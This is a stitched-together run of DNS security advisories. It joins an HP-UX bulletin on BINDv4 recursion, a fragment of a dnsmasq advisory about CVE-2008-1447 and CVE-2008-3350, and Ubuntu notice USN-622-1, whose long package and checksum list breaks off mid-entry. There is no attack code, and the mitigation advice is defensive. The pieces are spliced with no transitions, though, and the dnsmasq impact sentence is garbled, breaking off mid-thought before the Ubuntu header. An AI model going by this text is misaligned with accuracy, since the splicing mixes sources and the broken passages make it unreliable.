CERT VU#457875 ( http://www.kb.cert.org/vuls/id/457875) reports a potential security
vulnerability in the BINDv4 Domain Name Server (DNS).
HP-UX B.11.00 may be affected by this vulnerability if the BINDv4 Domain Name Server
(DNS) is configured to do both of the following:
* support recursive requests and cache the results
* respond to DNS requests made by untrusted systems
To determine if an HP-UX system has an affected version, search the output of
"swlist -a revision -l fileset" for one of the filesets listed below.
AFFECTED VERSIONS
HP-UX B.11.00
=============
InternetSrvcs.INETSVCS-RUN
action: add "options no-recursion" to /etc/named.boot
END AFFECTED VERSIONS
RESOLUTION
The potential vulnerability may be avoided by blocking access to the system from
untrusted systems or by disabling DNS recursion.
To disable DNS recursion, add the following to /etc/named.boot:
options no-recursion
The option will take effect when named is restarted.
Note: This issue has been previously reported in HPSBGN01156 SSRT2400 rev.0 (7 August 2003). HPSBGN01156 did not have the Affected Versions for the HP-UX Security Patch Check.
MANUAL ACTIONS: Yes - NonUpdate
add "options no-recursion" to /etc/named.boot
PRODUCT SPECIFIC INFORMATION
HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system.
Background
==========
Dnsmasq is a lightweight and easily-configurable DNS forwarder and DHCP
server.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dns/dnsmasq < 2.45 >= 2.45
Description
===========
* Dan Kaminsky of IOActive reported that dnsmasq does not randomize
UDP source ports when forwarding DNS queries to a recursing DNS
server (CVE-2008-1447).
* Carlos Carvalho reported that dnsmasq in the 2.43 version does not
properly handle clients sending inform or renewal queries for unknown
DHCP leases, leading to a crash (CVE-2008-3350).
Impact
======
A remote attacker could send spoofed DNS response traffic to dnsmasq,
possibly involving generating queries via multiple vectors, and spoof
DNS replies, which could e.g. Furthermore, an attacker could generate
invalid DHCP traffic and cause a Denial of Service. ===========================================================
Ubuntu Security Notice USN-622-1 July 08, 2008
bind9 vulnerability
CVE-2008-1447
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libdns21 1:9.3.2-2ubuntu1.5
Ubuntu 7.04:
libdns22 1:9.3.4-2ubuntu2.3
Ubuntu 7.10:
libdns32 1:9.4.1-P1-3ubuntu2
Ubuntu 8.04 LTS:
libdns35 1:9.4.2-10ubuntu0.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Dan Kaminsky discovered weaknesses in the DNS protocol as implemented
by Bind.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5.diff.gz
Size/MD5: 104296 a0aed8a7f9c1a914d9047876547c67d4
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5.dsc
Size/MD5: 803 795915bcbaf3e0c97f5ca1b541fecbe1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2.orig.tar.gz
Size/MD5: 5302112 55e709501a7780233c36e25ccd15ece2
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.2-2ubuntu1.5_all.deb
Size/MD5: 180736 0ca869db29381743a0aa2acd480c0d36
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 112040 52e0eb5609ddf50411d43f388a04f917
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 311534 80e47bf514a33cad401524d7f43e044b
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 184862 d09db412eb19271ecb2cf742a1816b05
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 1130056 50d2a84568a66d6ddf47e95b411fad29
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 92116 c71b74708301acf6a6ecbf608fab5d56
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 557278 63dc3e1e6488e6cff0059d1f3e490682
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 190576 c611f958e1393704d0ba84ed707839b1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 93250 f2005aeb8667d262326bf59d82c69ba1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 109046 4ecb1dbb245b01bddac47ea50e84acfd
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 111524 a75c2314434af46dd79be91ba0dba036
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_amd64.deb
Size/MD5: 219944 74b47bf188a3e82200ae564162d61a73
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 108882 b5967775be7b3115c62a4d7f9508b525
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 289854 1873ac12a760a4e14e5b88399658f905
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 175542 ea79ad2e1f210a7e107c90f5770bc806
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 997094 bb0cb2822c28a8e455bf1a928c6d0ef7
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 91336 7bd20507d22e86691fb648d12795fc95
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 482908 d20a97bb56024597c1d158ec69b41c14
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 172564 108d61d18f73a8c51913fb1c84260af9
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 90784 3850d2c7f69c31c2d1d013fb862b587d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 102422 6951c7cdfd7a801b249e33648213d6a4
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 107234 3d8606e265875294b7e150884be8cee7
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_i386.deb
Size/MD5: 203328 eb566ef1e4b485523f33271a001b56f9
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 110524 1efa8d84b535e465623561c1f678a89c
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 303594 9066c6e199c0598b7acd70b561506148
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 181654 c4b4fd9157adf5e449d5df01aef1e7d0
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 1204474 5d029c34854c4fca6b704fce98a74851
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 93418 bb908cbdb8c8028ad2af232f354a0008
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 516882 f8437dfca292d7d1d8b93c6aba2ae73a
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 182374 368127ca61e8e8e5bceb49870cd2bd70
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 93604 4e42b14ee385a7c44ee8c1f728cabff7
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 106410 f2db82079a9d85e5acb19e39eb2ced31
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 111058 06126f085691f8a2c8358e47f0a2d8d7
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_powerpc.deb
Size/MD5: 207816 45a904a0518de2feccc9678f83e4d5ec
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 110620 d5fdd4a4e6e4ea89c4e518f66acecbd1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 301372 e67bc7a6970f534ee5faac384801c895
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 180950 61dfdf0427c07fe2ab35901a64508b5a
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 1116008 8be769301060285de28ad3e568dfd647
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 91674 629c0a0296adcdd7f52547eace987c39
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 511130 8c5a1778a9efd974dded9ca0f8225bdd
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 181286 40c07c235b00a44aac6bbc28795c2c07
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 91184 8a2e4f0670f934d831c8cd1b40a3fa7a
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 103900 80107ec78e4a006784b3a117c05ee1e6
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 106762 8951b01a7b2f97aad4a93210d50850da
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_sparc.deb
Size/MD5: 211124 2978354d73f6a9bf7dcd3c96b919eec0
Updated packages for Ubuntu 7.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3.diff.gz
Size/MD5: 285716 085d15195d25e9ad690d374e9adaecb0
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3.dsc
Size/MD5: 888 9bde4140f2f312c3b4071990f21f5075
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4.orig.tar.gz
Size/MD5: 4043577 198181d47c58a0a9c0265862cd5557b0
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.4-2ubuntu2.3_all.deb
Size/MD5: 187788 25ad7fff219ac84a553e40a6c7af840c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 118810 baf5548fa89037279840b4158cf9c4eb
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 322984 08a1b75f9a77c618f2e36b0534e1a7be
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 194018 bf92cede850d5f189c8895fdce8141f8
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 1123068 35f889b48402c1bb56c58d2b0f61dbbf
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 96684 98747d65d02a685db5256e417a54870b
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 568742 d25c28c00bfc48ec52c18a3f5df8339a
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 191858 067227f2f582db56911dbf3236e4aea2
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 97646 ef6f169da9562b22237e6c7a3edbafda
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 112594 cf9a0a5c4a940b4ba2d169c9c081dd9f
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 116228 98dd0e9dcf07d0e49f0c4341e775bcf4
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_amd64.deb
Size/MD5: 228496 31efc89af88b933b901d67c61b194ba6
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 115168 6797a4d80f8a4196c8a948ad33bc39fe
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 303544 26dd7cd0aaf4712609a619846302ba21
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 184442 7cb775d8fe3051b3ccda2327d1c3083b
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 1018542 c0fdcbb4acc613859ce6ab4781762ff7
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 95774 5ddb6803f82c9117056a0a5de59aa5d6
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 497640 5d71a76c2185fb7631c07ea415037302
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 175420 a07afa38758a587ed0998b5f78629b3b
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 96014 bc47e546be9c1fd6a19e9d8d8366ed3d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 108214 686dd4ad9fb4413b7778786d667428e2
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 112700 86c736ba2fae3f194498d5f3f6de7306
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_i386.deb
Size/MD5: 213620 00fa556825d7defaa4fc45cad2138b02
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 118214 4081aec0d3d622fbc05dc097cf102e4f
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 324724 09c0e4862ed9691c2527f755683a8b8c
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 194978 b5f813766584254fd824e72baeffc96b
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 1169812 34192103d6041b6f50e7dd6551a6dbf1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 98074 06572e8c43b6eeeeba3352ba3b94ce65
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 511582 21cc7a4347b3bb863a7151ad5cf73bd1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 183468 5844029a87c42bc54a547acaff985442
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 98738 2eed8603e4ba78e0b07e4e21df59e93d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 112116 a8f232fa8d8ab6429c57827ca1af13bc
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 115894 193a734032dcdbb289fbddb68cb350b5
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_powerpc.deb
Size/MD5: 218796 cdc6ccf2614a684ecff0f63f9f96dfe1
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 117664 48cc134e0194e3d732e79ca699f8406b
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 315270 7bc67be9266eaddfc64138c6c01483bc
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 191400 bc4b1922d10028421b14b69bf9d76bb7
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 1141834 af414f9bcf9c42d1e52fe8b2069fc83d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 96070 43a9988edc73a9b4fd2ad6e98338a8fc
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 513792 55b3d92618f678690e91956b131fa330
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 180638 b24a1a0d2d50b9d2fcba45971d23a7a4
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 96248 425e3657f29e865c91be421484089106
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 109716 cddb416bc557fb9cdebc6372312c4350
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 113516 a102110917b6ec739fa2035e1f65e4a6
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_sparc.deb
Size/MD5: 220226 b855b98a0ebde055930e560feec2a3c0
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2.diff.gz
Size/MD5: 300771 40cda1f019e548208ef85f9dad5dfeec
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2.dsc
Size/MD5: 1001 e1318d3386a5d798b700b6d8ed108146
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1.orig.tar.gz
Size/MD5: 4987098 683293e3acc85e30f5ca4bba8a096303
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.4.1-P1-3ubuntu2_all.deb
Size/MD5: 233584 955901705316670276f41c633020a274
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 46106 8d04ee50411a1d62391209b8ccab5dfd
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 278364 1f2de92494c8a7b5e93a53c75cffbb44
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 117148 927ff60a9de441ef3b1a86337c8756a1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 1162042 2d7d3e28b6e8422abc7cdfc41f046c73
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 26006 be5c5f455a5507b9e14b8678dac0f6bb
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 552146 97272ff611d594b7346086268e4765ae
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 130934 4135eb09ffb1df2611dc809a682c74df
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 23180 a6afe8f12bf054deca547c2f72d55a66
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 42424 96a32f1fa3f81841fe7085bb01247f6d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 41990 c90cb0cac5341fb94c7c959983350dd9
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_amd64.deb
Size/MD5: 167296 61645dfcde5c7543d150d829ed113b0d
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 42116 2701dd72510ac551881624a6931069ec
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 254750 1300e37afb8268b112ab1718e998d443
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 106990 717db0ad88486bd34c79120f00e02551
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 1040234 db9099b5ac165aaaf6220317d054df8c
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 24768 7b5c03984b957dafa6b4bcd981c5af9f
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 470404 6a7d265fd0aba23035df443e8b78269b
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 113492 685a3b04a9581c29466b67fef742674d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 21570 23a9a67e65a5e2f8dfb836aba5b0ece5
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 36630 cbfc768cbeceb42d104f41307f720688
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 38268 8d71f0b2df12a449fa7c3fd7613ff682
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_i386.deb
Size/MD5: 150304 f9c7b0ee3d4891b06ef4271c62c292d4
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 41828 101a835923e507c0eea60ff08663b1a9
http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 250104 87f9678cd733aacc482b1cd7705a820d
http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 105740 c5035426f0bf196ad4f34d320e9126a5
http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 1025798 47551ddfeb321fd6ff69805bd3c72cf7
http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 24354 9c8a3f39052994adeb0e1277eb9c96d6
http://ports.ubuntu.com/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 449848 d70baaa8ab74b607cc20ac8befd935b3
http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 108538 e64e03f6db0678366f5ed7931bbb7bd8
http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 20936 c735ba0c832279b708b38dd995f90eea
http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 35840 6e09afe7daabc2722145eae0ccf64ebb
http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 36964 7cf9822533618d4eeaaaaca191081a10
http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_lpia.deb
Size/MD5: 146046 3e90eb9276c3c9cd29722b58b44825d6
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 45228 6f58fdfb1a9464505b63d6ee10bfb499
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 279194 7fb180ca0c0fb2197b6cabcb9e5b87c1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 117336 4a6d45d30c6dfd9b7525e9efeb7cc390
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 1209208 c23a85c019b655f9044207a98c9eb472
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 27166 92bd4c64f9914f63fc59973bc0e73d6d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 485638 3c3bff7bcd7df84170d9f45855785f46
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 121410 6eb18c5fee8ef25bfaab05b53a6776d1
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 24308 94df6003c7e061d9a1e1cbcc1ed1133d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 41128 a78b1e2958a2cda0347824e2d9eb7815
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 41354 d826c2e80c70c92c54c407fa6458a2d0
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_powerpc.deb
Size/MD5: 156660 24840c4483eb81fccfd483843c03fc21
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 44760 ff76458f2f3bc437f975710f0f44350f
